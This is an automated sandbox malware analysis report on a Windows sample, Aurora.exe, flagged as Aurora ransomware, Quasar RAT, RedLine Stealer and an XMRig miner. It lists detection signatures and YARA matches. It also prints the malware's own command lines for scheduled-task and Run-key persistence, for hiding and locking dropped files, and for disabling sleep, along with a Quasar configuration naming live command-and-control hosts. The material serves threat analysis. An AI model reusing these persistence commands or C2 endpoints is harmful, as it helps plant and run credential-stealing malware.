Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Aurora.exe

Overview

General Information

Sample name:Aurora.exe
Analysis ID:1483204
MD5:416de11d210ae0ff50214021ff57b32b
SHA1:3142453c18080b83d8dbdeba89524beea1c94ff3
SHA256:72e1fc6da0a5cfca80413b8b24a880b0688908264971cfedaf079ee52ce4d850
Tags:exe
Infos:

Detection

Aurora, Quasar, RedLine, Xmrig
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Sigma detected: Schedule system process
Sigma detected: Set autostart key via New-ItemProperty Cmdlet
Yara Aurora Stealer
Yara detected AntiVM3
Yara detected Quasar RAT
Yara detected RedLine Stealer
Yara detected Xmrig cryptocurrency miner
.NET source code references suspicious native API functions
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Connects to many ports of the same IP (likely port scanning)
Creates multiple autostart registry keys
DNS related to crypt mining pools
Detected Stratum mining protocol
Drops PE files with benign system names
Found direct / indirect Syscall (likely to bypass EDR)
Found evasive API chain (may stop execution after checking mutex)
Found many strings related to Crypto-Wallets (likely being stolen)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Hides threads from debuggers
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies power options to not sleep / hibernate
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Suspect Svchost Activity
Suspicious powershell command line found
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Uses known network protocols on non-standard ports
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Uses powercfg.exe to modify the power settings
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to modify clipboard data
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the clipboard data
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains more sections than normal
PE file contains sections with non-standard names
PE file does not import any functions
PE file overlay found
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses cacls to modify the permissions of files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • Aurora.exe (PID: 6256 cmdline: "C:\Users\user\Desktop\Aurora.exe" MD5: 416DE11D210AE0FF50214021FF57B32B)
    • AdobeUpdate.exe (PID: 3064 cmdline: "C:\Users\user\AppData\Roaming\AdobeLicense\AdobeUpdate.exe" MD5: 65F0A85C4B056D6BCEE60C49E2372E35)
      • cmd.exe (PID: 1220 cmdline: C:\Windows\system32\cmd.exe /c start cmd /Q /C " ping localhost -n 1 && copy "C:\Users\user\AppData\Roaming\AdobeLicense\AdobeUpdate.exe" "C:\Users\user\AppData\Local\Msedge.exe" && attrib +r +h +a "C:\Users\user\AppData\Local\Msedge.exe" && icacls "C:\Users\user\AppData\Local\Msedge.exe" /deny "everyone":(WD,AD,WEA,WA) && del "C:\Users\user\AppData\Roaming\AdobeLicense\AdobeUpdate.exe" && cmd /C "start "C:\Users\user\AppData\Local\Msedge.exe" && exit" && && exit " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6204 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 1516 cmdline: cmd /Q /C " ping localhost -n 1 && copy "C:\Users\user\AppData\Roaming\AdobeLicense\AdobeUpdate.exe" "C:\Users\user\AppData\Local\Msedge.exe" && attrib +r +h +a "C:\Users\user\AppData\Local\Msedge.exe" && icacls "C:\Users\user\AppData\Local\Msedge.exe" /deny "everyone":(WD,AD,WEA,WA) && del "C:\Users\user\AppData\Roaming\AdobeLicense\AdobeUpdate.exe" && cmd /C "start "C:\Users\user\AppData\Local\Msedge.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 5480 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • PING.EXE (PID: 2004 cmdline: ping localhost -n 1 MD5: 2F46799D79D22AC72C241EC0322B011D)
          • attrib.exe (PID: 6020 cmdline: attrib +r +h +a "C:\Users\user\AppData\Local\Msedge.exe" MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
          • icacls.exe (PID: 4828 cmdline: icacls "C:\Users\user\AppData\Local\Msedge.exe" /deny "everyone":(WD,AD,WEA,WA) MD5: 48C87E3B3003A2413D6399EA77707F5D)
          • cmd.exe (PID: 6204 cmdline: cmd /C "start "C:\Users\user\AppData\Local\Msedge.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • Msedge.exe (PID: 7252 cmdline: C:\Users\user\AppData\Local\Msedge.exe MD5: 65F0A85C4B056D6BCEE60C49E2372E35)
    • build.exe (PID: 6332 cmdline: "C:\Users\user\AppData\Roaming\Microsoft Edge\build.exe" MD5: C9A9D471428A5F92068C0823E6454254)
      • conhost.exe (PID: 4192 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • OneDrive.exe (PID: 6972 cmdline: "C:\Users\user\AppData\Roaming\OneDrive Update Tool\OneDrive.exe" MD5: 3B4F58CD4BCA7274BE25E885BE00798B)
      • powershell.exe (PID: 3320 cmdline: "powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'OneDriveUpdate';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'OneDriveUpdate' -Value '"C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exe"' -PropertyType 'String' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 7188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 6976 cmdline: "cmd" /C schtasks /create /tn \OneDriveUpdate /tr "C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • conhost.exe (PID: 7756 cmdline: C:\Windows\System32\conhost.exe MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • svchost.exe (PID: 4324 cmdline: C:\Windows\System32\svchost.exe MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
        • schtasks.exe (PID: 7332 cmdline: schtasks /create /tn \OneDriveUpdate /tr "C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f MD5: 48C2FE20575769DE916F48EF0676A965)
      • RegAsm.exe (PID: 7220 cmdline: #cmd MD5: 0D5DF43AF2916F47D00C1573797C1A13)
    • vlc.exe (PID: 7316 cmdline: "C:\Users\user\AppData\Roaming\VLC Media Player\vlc.exe" MD5: B9FC8581B52ABFC6B563DA731438E27D)
    • dw20.exe (PID: 7456 cmdline: dw20.exe -x -s 1480 MD5: 89106D4D0BA99F770EAFE946EA81BB65)
  • cmd.exe (PID: 7376 cmdline: C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7404 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 7496 cmdline: powercfg /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
    • powercfg.exe (PID: 7568 cmdline: powercfg /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
    • powercfg.exe (PID: 7656 cmdline: powercfg /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
    • powercfg.exe (PID: 7692 cmdline: powercfg /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
  • powershell.exe (PID: 7388 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#npnsokoe#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'ConsoleWindowsHost' /tr '''C:\Users\user\AppData\Roaming\Google\Chrome\svchost.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Google\Chrome\svchost.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'ConsoleWindowsHost' -RunLevel 'Highest' -Force; } MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 7396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 7532 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • OneDrive Updater.exe (PID: 7736 cmdline: "C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exe" MD5: 3B4F58CD4BCA7274BE25E885BE00798B)
    • RegAsm.exe (PID: 7880 cmdline: #cmd MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • Msedge.exe (PID: 7996 cmdline: "C:\Users\user\AppData\Local\Msedge.exe" MD5: 65F0A85C4B056D6BCEE60C49E2372E35)
  • OneDrive Updater.exe (PID: 8124 cmdline: "C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exe" MD5: 3B4F58CD4BCA7274BE25E885BE00798B)
    • RegAsm.exe (PID: 8156 cmdline: #cmd MD5: 0D5DF43AF2916F47D00C1573797C1A13)
    • RegAsm.exe (PID: 8164 cmdline: #cmd MD5: 0D5DF43AF2916F47D00C1573797C1A13)
    • RegAsm.exe (PID: 8172 cmdline: #cmd MD5: 0D5DF43AF2916F47D00C1573797C1A13)
    • RegAsm.exe (PID: 8180 cmdline: #cmd MD5: 0D5DF43AF2916F47D00C1573797C1A13)
    • RegAsm.exe (PID: 8188 cmdline: #cmd MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • Msedge.exe (PID: 7408 cmdline: "C:\Users\user\AppData\Local\Msedge.exe" MD5: 65F0A85C4B056D6BCEE60C49E2372E35)
  • cmd.exe (PID: 7672 cmdline: C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7696 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 7436 cmdline: powercfg /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
    • powercfg.exe (PID: 1196 cmdline: powercfg /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
    • powercfg.exe (PID: 5812 cmdline: powercfg /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
    • powercfg.exe (PID: 2756 cmdline: powercfg /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
  • powershell.exe (PID: 7404 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#npnsokoe#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'ConsoleWindowsHost' /tr '''C:\Users\user\AppData\Roaming\Google\Chrome\svchost.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Google\Chrome\svchost.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'ConsoleWindowsHost' -RunLevel 'Highest' -Force; } MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 7324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • OneDrive Updater.exe (PID: 2936 cmdline: "C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exe" MD5: 3B4F58CD4BCA7274BE25E885BE00798B)
    • RegAsm.exe (PID: 7932 cmdline: #cmd MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • powershell.exe (PID: 7764 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lygkxs#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'ConsoleWindowsHost' /tr '''C:\Users\user\AppData\Roaming\Google\Chrome\svchost.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Google\Chrome\svchost.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'ConsoleWindowsHost' -RunLevel 'Highest' -Force; } MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 7736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
AuroraRansomware
  • Oktropys
https://malpedia.caad.fkie.fraunhofer.de/details/win.aurora
NameDescriptionAttributionBlogpost URLsLink
Quasar RAT, QuasarRATQuasar RAT is a malware family written in .NET which is used by a variety of attackers. The malware is fully functional and open source, and is often packed to make analysis of the source more difficult.
  • APT33
  • Dropping Elephant
  • Stone Panda
  • The Gorgon Group
https://malpedia.caad.fkie.fraunhofer.de/details/win.quasar_rat
NameDescriptionAttributionBlogpost URLsLink
RedLine StealerRedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer
NameDescriptionAttributionBlogpost URLsLink
xmrigAccording to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig
{"Version": "1.4.1", "Host:Port": "auroraforge.art:55326;thesirenmika.com:55713;", "SubDirectory": "SubDir", "InstallName": "up2.exe", "MutexName": "0cbdfe7f-0215-41e8-a7b5-d4fbbc555089", "StartupKey": "Quasar Client Startup", "Tag": "themdas", "LogDirectoryName": "Logs", "ServerSignature": "PlHMOMtgocXM3HQK38PG08Pjiit+NwEciQu5lPY8tfLnYjCoMZYAx0xtdI+SvG5C0DXq12cXcC0umf/mq9foVZXMNF5Hs2PQTK2JDMn/hRfIF+Jjsb6WM+BVxpI718gj4lZGbCgGkF84rco627EYC7FkvV+GH8BLt9O9hPr4/+rJiNgiCoIYMn0OgCE/sH3sGydQJg57bn9U/mXFlhyIRhtm4gg2lM1G8RQ2XH+1kM20YvujsfPY0iStU8ykEpDnPvo2nlJo9S9+MJkEMt42ESO7Wgwea2ACoL2QuywV5GfCFYmzHmw9IDaqA/y7WyvVIvEg0NoGsezhwo2e6oEJrvYMUde6OTHjwHC8kacIVCvh6+yByGXPCjdQ+H6smKrq+LpoQLVQ20Io+hUnJLLx3faDB+Mrdo/wn43FOeeY6pvde3SMsY1XpENL1JPs8GG3TI0La479nFehiVp1bownoMxD7bv5pz2OTSwC+bmeB/u6k/e0qAPIfFzFMlMKPBLs1ee2ZhtAAu9MNcYtT4iTjxGRo+BdYz4VzLF0YuR7gW/KXvxHfHzIxl5gsQqlHmTKIvmwkZApWd13KsPue7aMCNBNetMgKotbQLGwuPGWkXPtyVe3zbXV84yx9a8EXdQy2rBif3ikTmvhQzPtqeUrXJzqUAZPzqvnfpFUeP+/3c0=", "ServerCertificate": "MIIE9DCCAtygAwIBAgIQAMFuuJQ2UWVtaIczUNgeazANBgkqhkiG9w0BAQ0FADAbMRkwFwYDVQQDDBBRdWFzYXIgU2VydmVyIENBMCAXDTIzMDQwMzA0MDUwOFoYDzk5OTkxMjMxMjM1OTU5WjAbMRkwFwYDVQQDDBBRdWFzYXIgU2VydmVyIENBMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAiClM+MYvRIRZkg0freUTCe0NshHnHXvYh8i2/B6np2DSYc6syzKH/d4kemUxEeD770K+4fsX42DqD05wvk+SmcuwHZ26OYCKSI/rg79364nUGWDwdTjS2LOpVzPfC/rF+aUI5X41YVO/BOt8Kw8yb2j1/uUVNajjm2gM7Wy3DAKG2PUXFGK/xtJsuOfjWVEFEStZGs5EbE5kMuNzxU3UfatoLZCVW866YNZIs9KIwFLYBaxoBScqJVcpRql2nDMOyOZt+wocL9l5buEIyKqT4sdRNUfoAUv6kxgo23l9f/dOMxG4eLYd7rNf6r5l0xRJMaz7emiUnqYyibaBmC2fIv6fuyjPZn9QB4+ujg0OGaWAPnikZXEd1F5jy4jwnBqilo+Kx5UdXg00pqVYBXr+K3AzcMzc02Yqwr3J8Rlfgsu4C6BVbHUY6AXA+8xzbyLK3fvp0M9Dxs8DKw7UpkZ7Bolhy8NE3LRgI7TFHXNjRzM8u5ZiCL8VIUOsDgUFKakEh0MrGEaHZUG3VjUO0xDdA7CG9s8FQ5mYPH2NlORjReWcdoJurPogIffwNkP6nIgltEwBuVufNrMjtUDq3GUNiuhG5GJnDVypRGAOJEeOkug+OMfFmTDhOAWuPsvr+dhak7ue/4FlW2gxA+HRlw200v70/hHbpNv66ypjWg1X9jECAwEAAaMyMDAwHQYDVR0OBBYEFEZ+DMcRz+rZt2AYOssjt4gJDXJOMA8GA1UdEwEB/wQFMAMBAf8wDQYJKoZIhvcNAQENBQADggIBAHAGY8cy4TMd3uimwhX4giP4+xh3Nf0FVipqVxteNQTqxP7t2BabEdhmtlh7O/QY0NrQcHZfTQ0N17MnczuHDPsE41keL18jYueJZ+yId43zFc3Rlez8W4nrId2DbbcCRffmYSuwAGvXfcZDOYrTOpXFdU1WeVOazRUYYyrlBUZfOX+lbLHSlho/C7/6ULvYz9LIC1WakGFjLt8Yw5jpWSBPjGpbOUNIZ0JFalvr7iCrrNEtsLEQs5rcoiH73TBGE1QDgTOz/4zp6WRNoRr9Yy5mbC2qB2RbAtMIydKX/3yBZw/gHBGK7bxGmcecLwYVFkLR/BvfcpdVP4Jy5O65oEx01sFfC3TMG+XyGV3CxOvoG4brCW99GDZmUWsVmmbSI+X2caujvstj6psjYeRcGUELmU6dPNxWTNUOeeppRDQfZeA0rEr5pecx4NMCj6nLrhRUlTQ6pXg6vpVt2PS+5xC5qgn839Ic5RehAccmgHat+VqnqlqF9oucwNJVDoOcNey0yAYXMPqM6KZrVsrEGmxljkuqaafi9CJJbSah9K6YMfZdZsPxlNnLmg3CcSNISkL602S3tiWO1/heTAFVK6dx1domDE4Lk6Y7hEqEdDfyokDNExRPfD5ngHpseHXEYQteQywDb5MZZc7XLHM4dgm3cRxnGtWR0H7SjMddMZ5C"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Roaming\Microsoft Edge\build.exeJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      C:\Users\user\AppData\Roaming\Microsoft Edge\build.exeJoeSecurity_RedLineYara detected RedLine StealerJoe Security
        C:\Users\user\AppData\Roaming\Microsoft Edge\build.exeWindows_Trojan_RedLineStealer_f54632ebunknownunknown
        • 0x135ca:$a4: get_ScannedWallets
        • 0x12428:$a5: get_ScanTelegram
        • 0x1324e:$a6: get_ScanGeckoBrowsersPaths
        • 0x1106a:$a7: <Processes>k__BackingField
        • 0xef7c:$a8: <GetWindowsVersion>g__HKLM_GetString|11_0
        • 0x1099e:$a9: <ScanFTP>k__BackingField
        C:\Users\user\AppData\Roaming\Microsoft Edge\build.exeMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
        • 0x1048a:$u7: RunPE
        • 0x13b41:$u8: DownloadAndEx
        • 0x9130:$pat14: , CommandLine:
        • 0x13079:$v2_1: ListOfProcesses
        • 0x1068b:$v2_2: get_ScanVPN
        • 0x1072e:$v2_2: get_ScanFTP
        • 0x1141e:$v2_2: get_ScanDiscord
        • 0x1240c:$v2_2: get_ScanSteam
        • 0x12428:$v2_2: get_ScanTelegram
        • 0x124ce:$v2_2: get_ScanScreen
        • 0x13216:$v2_2: get_ScanChromeBrowsersPaths
        • 0x1324e:$v2_2: get_ScanGeckoBrowsersPaths
        • 0x13509:$v2_2: get_ScanBrowsers
        • 0x135ca:$v2_2: get_ScannedWallets
        • 0x135f0:$v2_2: get_ScanWallets
        • 0x13610:$v2_3: GetArguments
        • 0x11cd9:$v2_4: VerifyUpdate
        • 0x165ee:$v2_4: VerifyUpdate
        • 0x139ca:$v2_5: VerifyScanRequest
        • 0x130c6:$v2_6: GetUpdates
        • 0x165cf:$v2_6: GetUpdates
        SourceRuleDescriptionAuthorStrings
        00000004.00000000.1688439465.00000000005E2000.00000002.00000001.01000000.00000008.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000004.00000000.1688439465.00000000005E2000.00000002.00000001.01000000.00000008.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
            00000004.00000000.1688439465.00000000005E2000.00000002.00000001.01000000.00000008.sdmpWindows_Trojan_RedLineStealer_f54632ebunknownunknown
            • 0x133ca:$a4: get_ScannedWallets
            • 0x12228:$a5: get_ScanTelegram
            • 0x1304e:$a6: get_ScanGeckoBrowsersPaths
            • 0x10e6a:$a7: <Processes>k__BackingField
            • 0xed7c:$a8: <GetWindowsVersion>g__HKLM_GetString|11_0
            • 0x1079e:$a9: <ScanFTP>k__BackingField
            0000001F.00000002.1804400683.000000000466E000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_QuasarYara detected Quasar RATJoe Security
              00000007.00000002.1727999189.00000000030B1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_QuasarYara detected Quasar RATJoe Security
                Click to see the 25 entries
                SourceRuleDescriptionAuthorStrings
                4.0.build.exe.5e0000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                  4.0.build.exe.5e0000.0.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                    4.0.build.exe.5e0000.0.unpackWindows_Trojan_RedLineStealer_f54632ebunknownunknown
                    • 0x135ca:$a4: get_ScannedWallets
                    • 0x12428:$a5: get_ScanTelegram
                    • 0x1324e:$a6: get_ScanGeckoBrowsersPaths
                    • 0x1106a:$a7: <Processes>k__BackingField
                    • 0xef7c:$a8: <GetWindowsVersion>g__HKLM_GetString|11_0
                    • 0x1099e:$a9: <ScanFTP>k__BackingField
                    4.0.build.exe.5e0000.0.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
                    • 0x1048a:$u7: RunPE
                    • 0x13b41:$u8: DownloadAndEx
                    • 0x9130:$pat14: , CommandLine:
                    • 0x13079:$v2_1: ListOfProcesses
                    • 0x1068b:$v2_2: get_ScanVPN
                    • 0x1072e:$v2_2: get_ScanFTP
                    • 0x1141e:$v2_2: get_ScanDiscord
                    • 0x1240c:$v2_2: get_ScanSteam
                    • 0x12428:$v2_2: get_ScanTelegram
                    • 0x124ce:$v2_2: get_ScanScreen
                    • 0x13216:$v2_2: get_ScanChromeBrowsersPaths
                    • 0x1324e:$v2_2: get_ScanGeckoBrowsersPaths
                    • 0x13509:$v2_2: get_ScanBrowsers
                    • 0x135ca:$v2_2: get_ScannedWallets
                    • 0x135f0:$v2_2: get_ScanWallets
                    • 0x13610:$v2_3: GetArguments
                    • 0x11cd9:$v2_4: VerifyUpdate
                    • 0x165ee:$v2_4: VerifyUpdate
                    • 0x139ca:$v2_5: VerifyScanRequest
                    • 0x130c6:$v2_6: GetUpdates
                    • 0x165cf:$v2_6: GetUpdates
                    7.2.OneDrive.exe.43d6b80.1.unpackJoeSecurity_QuasarYara detected Quasar RATJoe Security
                      Click to see the 22 entries

                      System Summary

                      barindex
                      Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\AppData\Roaming\VLC Media Player\vlc.exe, ProcessId: 7316, TargetFilename: C:\Users\user\AppData\Roaming\Google\Chrome\svchost.exe
                      Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "cmd" /C schtasks /create /tn \OneDriveUpdate /tr "C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f, CommandLine: "cmd" /C schtasks /create /tn \OneDriveUpdate /tr "C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\OneDrive Update Tool\OneDrive.exe" , ParentImage: C:\Users\user\AppData\Roaming\OneDrive Update Tool\OneDrive.exe, ParentProcessId: 6972, ParentProcessName: OneDrive.exe, ProcessCommandLine: "cmd" /C schtasks /create /tn \OneDriveUpdate /tr "C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f, ProcessId: 6976, ProcessName: cmd.exe
                      Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "cmd" /C schtasks /create /tn \OneDriveUpdate /tr "C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f, CommandLine: "cmd" /C schtasks /create /tn \OneDriveUpdate /tr "C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\OneDrive Update Tool\OneDrive.exe" , ParentImage: C:\Users\user\AppData\Roaming\OneDrive Update Tool\OneDrive.exe, ParentProcessId: 6972, ParentProcessName: OneDrive.exe, ProcessCommandLine: "cmd" /C schtasks /create 